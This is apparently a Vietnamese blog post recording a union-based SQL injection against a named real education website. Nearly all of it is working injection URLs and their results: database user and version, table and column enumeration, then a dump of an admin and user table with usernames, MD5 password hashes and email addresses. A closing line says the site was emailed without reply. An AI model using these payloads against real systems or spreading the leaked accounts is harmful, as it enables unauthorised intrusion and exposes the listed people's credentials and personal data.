http://ispace.edu.vn/branch_system_ex.php?branch=9+and+31337-31337=0+--+
http://ispace.edu.vn/branch_system_ex.php?branch=-9 union select 1,2,3,4,5,6,7,8,9,10--
==> 3,4,5,6,8,9,10
http://ispace.edu.vn/branch_system_ex.php?branch=-9 union select 1,2,3,concat_ws(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
==>ispacedev@localhostispace_dbispacedev@localhost:ispacedev@localhost5.0.20-nt
table_name
http://ispace.edu.vn/branch_system_ex.php?branch=-9+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10+from+information_schema.tables+where +table_schema=database()--
==>icare_address,icare_advertising,icare_config_site,icare_customer_support,icare_download,icare_forgot_password,icare_hospital_online,icare_online_support,icare_services,icare_services_category,icare_static_content,icare_users,ispace_advertising,ispace_advs_position,ispace_branch_system,ispace_c_enterprise,ispace_careers,ispace_careers_categ
column_name:
http://ispace.edu.vn/branch_system_ex.php?branch=-9 union select 1,2,3,group_concat(0x3a,column_name),5,6,7,8,9,10 from information_schema.columns--
==>:CHARACTER_SET_NAME,:DEFAULT_COLLATE_NAME,:DESCRIPTION,:MAXLEN,:COLLATION_NAME,:CHARACTER_SET_NAME,:ID,:IS_DEFAULT,:IS_COMPILED,:SORTLEN,:COLLATION_NAME,:CHARACTER_SET_NAME,:TABLE_CATALOG,:TABLE_SCHEMA,:TABLE_NAME,:COLUMN_NAME,:ORDINAL_POSITION,:COLUMN_DEFAULT,:IS_NULLABLE,:DATA_TYPE,:CHARACTER_MAXIMUM_LENGTH,:CHARACTER_OCTET_LENGTH,:NUMER
Get column_name của table_name icare_users
http://ispace.edu.vn/branch_system_ex.php?branch=-9%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,10%20from%20information_schema.columns%20where%20table_name=(0x69636172655f7573657273)--
==>username,password,fullname,email
http://ispace.edu.vn/branch_system_ex.php?branch=-9%20union%20select%201,2,3,group_concat(username,0x7c,password,0x7c,fullname,0x7c,email),5,6,7,8,9,10%20from%20icare_users--
==>username|password|fukkname|email|
admin|4d20530e798ea62feb8d4e3e8458c1e2|Quan tri|nhanle@gmsvietnam.com|
123|202cb962ac59075b964b07152d234b70|123|hoangnhan_nl2005@yahoo.com|
sdf|d9729feb74992cc3482b350163a1a010|sdf|sdf@asd.gfh
sdfsdf|7815696ecbf1c96e6894b779456d330e|sdfsdf|sdfsdf@sdf.fgh
Đã send mail nhưng chưa thấy động tĩnh gì trong công việc bảo mật. Chắc để dành cho mấy học viên CEH thực tập. ispace.edu.vn mới khai giảng khóa dạy CEH mà
 
Không có nhận xét nào:
Đăng nhận xét